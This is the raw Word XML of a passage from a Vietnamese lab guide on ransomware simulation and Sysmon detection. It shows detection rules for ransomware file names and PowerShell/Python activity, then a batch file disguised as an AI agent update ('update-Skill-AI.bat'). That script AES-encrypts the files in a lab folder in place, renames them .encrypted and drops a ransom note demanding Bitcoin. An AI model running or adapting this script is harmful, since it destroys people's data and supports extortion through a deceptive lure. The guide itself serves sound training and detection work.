        <w:t xml:space="preserve">        &lt;Image condition="end with"&gt;\py.exe&lt;/Image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EE529" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/Rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA06AD" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/ProcessCreate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DED7D7" w14:textId="77777777"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p>
    <w:p w14:paraId="2B0B2767" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;NetworkConnect onmatch="include"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F35B27" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;Rule groupRelation="or"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FCE4F9" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;Image condition="end with"&gt;\python.exe&lt;/Image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8FD52" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;Image condition="end with"&gt;\powershell.exe&lt;/Image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B1CF7" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/Rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA2F1F7" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/NetworkConnect&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12298074" w14:textId="77777777"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p>
    <w:p w14:paraId="5D318F05" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;FileCreate onmatch="include"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5148AB73" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;Rule groupRelation="or"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE6458C" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;TargetFilename condition="end with"&gt;.encrypted&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0705D7" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;TargetFilename condition="end with"&gt;\README_RANSOM.txt&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3477FE38" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;TargetFilename condition="end with"&gt;\thekey.key&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A608095" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;TargetFilename condition="end with"&gt;\ransom.py&lt;/TargetFilename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331D6F4" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/Rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A102E2E" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/FileCreate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C83E87" w14:textId="77777777"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p>
    <w:p w14:paraId="02139424" w14:textId="77777777" w:rsidR="008A4F40" w:rsidRPr="008A4F4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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/EventFiltering&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09228FE2" w14:textId="4426ED6A" w:rsidR="00091E90" w:rsidRDefault="008A4F40" w:rsidP="008A4F40">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>&lt;/Sysmon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49B998" w14:textId="77777777" w:rsidR="00AC2AC8" w:rsidRPr="00AC2AC8" w:rsidRDefault="00AC2AC8" w:rsidP="00AC2AC8">
      <w:pPr>
        <w:spacing w:after="200"/>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vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó cài đặt để sysmon update: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sysmon64.exe -accepteula -i sysmon-ransomware.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3005CEF9" w14:textId="7D32954B" w:rsidR="00AC2AC8" w:rsidRPr="00AC2AC8" w:rsidRDefault="00AC2AC8" w:rsidP="00AC2AC8">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rồi kiểm tra dịch vụ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Get-Service Sysmon64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D44B9" w14:textId="6C08134E" w:rsidR="00AC2AC8" w:rsidRDefault="00AC2AC8" w:rsidP="00AC2AC8">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CD98E07" wp14:editId="112A4B3B">
            <wp:extent cx="3010161" cy="1104996"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="164149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98520" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3010161" cy="1104996"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5B2143" w14:textId="550F50F6" w:rsidR="00AC2AC8" w:rsidRPr="00AC2AC8" w:rsidRDefault="00AC2AC8" w:rsidP="00AC2AC8">
      <w:pPr>
        <w:spacing w:after="200"/>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Tiếp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> theo</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> kiểm tra cấu hình đang áp dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17EBD1" w14:textId="77777777" w:rsidR="00AC2AC8" w:rsidRPr="00AC2AC8" w:rsidRDefault="00AC2AC8" w:rsidP="00AC2AC8">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Sysmon\Sysmon64.exe -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73097318" w14:textId="17174A43" w:rsidR="00AC2AC8" w:rsidRDefault="00AC2AC8" w:rsidP="00AC2AC8">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7388A834" wp14:editId="0C9F0B2A">
            <wp:extent cx="5733415" cy="3766820"/>
            <wp:effectExtent l="0" t="0" r="635" b="5080"/>
            <wp:docPr id="94483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37453" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3766820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CA6CF4" w14:textId="77777777" w:rsidR="000D0C31" w:rsidRDefault="000D0C31">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5F2771" w14:textId="79113FD3"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trình chỉ xử lý các file nằm trực tiếp trong thư mục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2078E49B"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C:\Users\Admin\Downloads\Tailieunoibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6DDE2"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Phạm vi này được giới hạn nhằm bảo đảm hành vi mô phỏng không ảnh hưởng đến dữ liệu nằm ngoài thư mục lab. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDAFD32" w14:textId="77777777" w:rsidR="000D373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1. Chuẩn bị tài liệu nội bộ giả lập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3035B1" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="20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Chuẩn bị một số tài liệu mẫu, bao gồm file văn bản và tài liệu nội bộ giả lập. Các file này được sử dụng làm dữ liệu đầu vào cho quá trình mô phỏng mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A8492" w14:textId="5CBCFD81" w:rsidR="00D214E3" w:rsidRPr="00D214E3" w:rsidRDefault="00D214E3">
      <w:pPr>
        <w:spacing w:after="20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Có thể sử dụng các file trong drive này : </w:t>
      </w:r>
      <w:r w:rsidRPr="00D214E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://drive.google.com/drive/folders/1iV_WWebgqby3DwfRzwl9jJ1-gi-hlAHi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EBDE2B" w14:textId="7272C5DD" w:rsidR="000D3737" w:rsidRPr="000D0C31" w:rsidRDefault="000D0C31" w:rsidP="000D0C31">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0C31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C57E1C1" wp14:editId="327CA280">
            <wp:extent cx="3551228" cy="929721"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="78369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94011" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3551228" cy="929721"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB6FA00" w14:textId="77777777" w:rsidR="000D373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Bước 2. Tạo snapshot hoặc bản sao lưu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1BECB"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Trước khi chạy chương trình mô phỏng, tạo snapshot cho máy Windows hoặc sao lưu toàn bộ thư mục Tailieunoibo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6421680E" w14:textId="77777777" w:rsidR="000D3737"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Bước 3. Chuẩn bị tệp giả mạo cập nhật AI Agent update-Skill-AI.bat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C38B1F9" w14:textId="32CB627B" w:rsidR="000D3737" w:rsidRPr="000D0C31" w:rsidRDefault="00000000" w:rsidP="000D0C31">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>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Tạo file update-Skill-AI.bat và lưu tại thư mục Downloads. Nội dung chương trình xác định thư mục kiểm thử, tạo file Python trung gian ransom.py, sinh khóa mã hóa và xử lý các tệp nằm trực tiếp trong thư mục Tailieunoibo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF4EC2"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@echo off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD630F"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setlocal enabledelayedexpansion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE1694"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p>
    <w:p w14:paraId="2F752DB1"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set "LAB_DIR=C:\Users\admin\Downloads\Tailieunoibo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66B7F1"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set "KEY_FILE=%LAB_DIR%\thekey.key"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB6DD2"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set "EXT=.encrypted"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A0DFE3"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p>
    <w:p w14:paraId="5DB9F60F"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if not exist "%LAB_DIR%" mkdir "%LAB_DIR%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42217B2F"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p>
    <w:p w14:paraId="197F9CD5"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echo [*] Bat dau mo phong ransomware tu file BAT...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB05A4A"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echo [*] Thu muc lam viec: %LAB_DIR%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84AA97"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p>
    <w:p w14:paraId="6B91374C"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powershell.exe -NoProfile -ExecutionPolicy Bypass -Command ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0353A6"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"$lab = '%LAB_DIR%'; $keyFile = '%KEY_FILE%'; $ext = '%EXT%'; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACD6A7"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$excluded = @('simulation.bat', 'ransom.bat', 'thekey.key', 'decrypt.bat', 'README_RANSOM.txt'); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B3AC38"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$files = Get-ChildItem -Path $lab -File; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE2BB3A"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$key = [byte[]]::new(32); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3835ACF0"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$rng = [System.Security.Cryptography.RNGCryptoServiceProvider]::Create(); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E38393E"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$rng.GetBytes($key); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8F95B"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[System.IO.File]::WriteAllBytes($keyFile, $key); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382FF62"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Write-Host '[+] Da tao khoa AES-256 tai' $keyFile; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338C3EF3"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$count = 0; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657BCC8"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foreach ($f in $files) { ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF20998"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 xml:space="preserve">    $name = $f.Name; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7666C3E3"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 xml:space="preserve">    if ($excluded -contains $name) { continue; } ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F75DA18"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 xml:space="preserve">    if ($name -like ('*' + $ext)) { continue; } ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CA3A9"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 xml:space="preserve">    try { ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5F552B"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 xml:space="preserve">        $bytes = [System.IO.File]::ReadAllBytes($f.FullName); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70535D76"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 xml:space="preserve">        $iv = [byte[]]::new(16); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49356809"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 xml:space="preserve">        $rng.GetBytes($iv); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4F7F7"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 xml:space="preserve">        $aes = [System.Security.Cryptography.Aes]::Create(); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B097847"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 xml:space="preserve">        $aes.Key = $key; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05580274"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 xml:space="preserve">        $aes.IV = $iv; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C62DAA2"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 xml:space="preserve">        $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A3F10"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620203DB"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 xml:space="preserve">        $encryptor = $aes.CreateEncryptor(); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025AC77F"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 xml:space="preserve">        $cipher = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA40BEE"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 xml:space="preserve">        [System.IO.File]::WriteAllBytes($f.FullName, $iv + $cipher); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A9D88"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 xml:space="preserve">        $newName = $f.FullName + $ext; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2A1C63"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 xml:space="preserve">        Rename-Item -Path $f.FullName -NewName $newName; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668FBB5C"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 xml:space="preserve">        Write-Host '[+] Ma hoa va ghi de: ' $newName; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33139782"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 xml:space="preserve">        $count++; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A81CF6"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 xml:space="preserve">    } catch { ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796BCED3"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 xml:space="preserve">        Write-Host '[!] Loi voi file' $f.Name ': ' $_.Exception.Message; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA5D1A"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 xml:space="preserve">    } ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35029061"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 ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E699C39"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if ($count -gt 0) { ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B1F61"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 xml:space="preserve">    $note = Join-Path $lab 'README_RANSOM.txt'; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0FC2EC"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 xml:space="preserve">    $content = 'Your files have been encrypted with AES-256.\nContact us at fake@ransom.com or pay 0.5 BTC.\nDo not rename or modify encrypted files.'; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB5CD26"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 xml:space="preserve">    [System.IO.File]::WriteAllText($note, $content); ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028BF690"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 xml:space="preserve">    Write-Host '[+] Da tao ransom note: ' $note; ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7E97ED"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 ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69973FFB"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Write-Host '[+] Hoan thanh. Da ma hoa ' $count ' file.'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E6BB4"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p>
    <w:p w14:paraId="0EF6CB55"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echo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE347C8"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echo === HOAN THANH ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26459D92" w14:textId="77777777" w:rsidR="000D0C31"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pause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E432B2A" w14:textId="57BAC2AE" w:rsidR="000D3737" w:rsidRPr="000D0C31" w:rsidRDefault="000D0C31" w:rsidP="000D0C31">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
